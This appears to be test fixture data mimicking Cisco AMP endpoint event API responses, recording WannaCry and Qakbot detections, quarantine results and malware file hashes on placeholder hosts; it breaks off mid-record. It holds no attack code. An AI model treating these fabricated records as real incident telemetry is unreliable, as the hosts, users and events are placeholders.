-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":111000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 